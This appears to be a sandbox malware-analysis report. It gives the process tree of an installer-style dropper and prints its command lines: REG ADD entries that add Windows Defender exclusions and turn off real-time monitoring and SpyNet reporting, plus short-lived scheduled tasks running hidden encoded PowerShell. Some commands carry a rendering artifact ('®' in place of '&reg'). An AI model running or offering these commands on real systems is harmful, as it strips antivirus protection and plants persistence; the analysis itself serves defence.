| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
| PID 1628 wrote to memory of 268 | 1628 | Install.exe | 31 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 1628 wrote to memory of 1888 | 1628 | Install.exe | 33 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 268 wrote to memory of 1164 | 268 | forfiles.exe | 35 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1888 wrote to memory of 1892 | 1888 | forfiles.exe | 36 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1164 wrote to memory of 912 | 1164 | cmd.exe | 37 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1892 wrote to memory of 968 | 1892 | cmd.exe | 38 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1164 wrote to memory of 1244 | 1164 | cmd.exe | 40 |
| PID 1892 wrote to memory of 1016 | 1892 | cmd.exe | 39 |
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\7zSF068.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:912
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1244
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:968
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1016
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJaSgeuiG" /SC once /ST 14:11:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJaSgeuiG"4⤵PID:548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJaSgeuiG"4⤵PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvlIjxbhjqoskMIGsW" /SC once /ST 18:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\vzXMZqI.exe\" Fi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:960
-
-
-
-
[L1] C:\Windows\system32\taskeng.exe  (PID 780)
  cmdline: taskeng.exe {002F7B29-A817-43CB-8462-F491F620BFFD} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
  [L2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 1080)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    (the EncodedCommand is UTF-16LE base64 and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force; the same value is used by every powershell.EXE and schtasks /TR entry in this tree)
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    [L3] C:\Windows\system32\gpupdate.exe  (PID 556)
      cmdline: "C:\Windows\system32\gpupdate.exe" /force
  [L2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 1620)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    [L3] C:\Windows\system32\gpupdate.exe  (PID 1312)
      cmdline: "C:\Windows\system32\gpupdate.exe" /force
  [L2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 1424)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    [L3] C:\Windows\system32\gpupdate.exe  (PID 1184)
      cmdline: "C:\Windows\system32\gpupdate.exe" /force
  [L2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (PID 544)
    cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    [L3] C:\Windows\system32\gpupdate.exe  (PID 988)
      cmdline: "C:\Windows\system32\gpupdate.exe" /force
[L1] C:\Windows\system32\gpscript.exe  (PID 1736)
  cmdline: gpscript.exe /RefreshSystemParam
[L1] C:\Windows\system32\taskeng.exe  (PID 1016)
  cmdline: taskeng.exe {D4733AF6-488D-41CA-AF51-432069F5FB9C} S-1-5-18:NT AUTHORITY\System:Service:
  [L2] C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\vzXMZqI.exe  (PID 812)
    cmdline: C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\vzXMZqI.exe Fi /site_id 525403 /S
    - Executes dropped EXE
    - Drops file in System32 directory
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 2024)
      cmdline: schtasks /CREATE /TN "gWRYnfMTm" /SC once /ST 11:25:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 2004)
      cmdline: schtasks /run /I /tn "gWRYnfMTm"
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 904)
      cmdline: schtasks /DELETE /F /TN "gWRYnfMTm"
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1616)
      cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1092)
        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
        - Modifies Windows Defender Real-time Protection settings
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1964)
      cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 976)
        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
        - Modifies Windows Defender Real-time Protection settings
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1572)
      cmdline: schtasks /CREATE /TN "giccBIyDU" /SC once /ST 16:35:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 964)
      cmdline: schtasks /run /I /tn "giccBIyDU"
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1040)
      cmdline: schtasks /DELETE /F /TN "giccBIyDU"
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1984)
      cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 556)
        cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1092)
      cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 984)
        cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 976)
      cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 960)
        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:32
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1264)
      cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1576)
        cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:64
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 1792)
      cmdline: cmd /C copy nul "C:\Windows\Temp\TKLYYQlZQscfmQGO\EithrlnS\KWNnrTVprbxBZNrS.wsf"
    [L3] C:\Windows\SysWOW64\wscript.exe  (PID 1520)
      cmdline: wscript "C:\Windows\Temp\TKLYYQlZQscfmQGO\EithrlnS\KWNnrTVprbxBZNrS.wsf"
      - Modifies data under HKEY_USERS
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1888)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1424)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1688)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 580)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1512)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1548)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1332)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1668)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1372)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1344)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1984)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1780)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 960)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1832)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1792)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 628)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:64
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 872)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 592)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 568)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 580)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 988)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1904)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1712)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1312)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1472)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 556)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1984)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1996)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 688)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1580)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1792)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:32
        - Windows security bypass
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1720)
        cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:64
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1748)
      cmdline: schtasks /CREATE /TN "gYlRDXrIt" /SC once /ST 17:56:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 2004)
      cmdline: schtasks /run /I /tn "gYlRDXrIt"
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 916)
      cmdline: schtasks /DELETE /F /TN "gYlRDXrIt"
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 968)
      cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 556)
        cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    [L3] C:\Windows\SysWOW64\cmd.exe  (PID 912)
      cmdline: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      [L4] C:\Windows\SysWOW64\reg.exe  (PID 1984)
        cmdline: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 308)
      cmdline: schtasks /CREATE /TN "JApWNoHZsVVCavdbE" /SC once /ST 04:47:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\xqcOwVf.exe\" PA /site_id 525403 /S" /V1 /F
      - Drops file in Windows directory
      - Creates scheduled task(s)
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1444)
      cmdline: schtasks /run /I /tn "JApWNoHZsVVCavdbE"
  [L2] C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\xqcOwVf.exe  (PID 1552)
    cmdline: C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\xqcOwVf.exe PA /site_id 525403 /S
    - Executes dropped EXE
    - Checks computer location settings
    - Drops Chrome extension
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    [L3] C:\Windows\SysWOW64\schtasks.exe  (PID 1216)
      cmdline: schtasks /DELETE /F /TN "bvlIjxbhjqoskMIGsW"
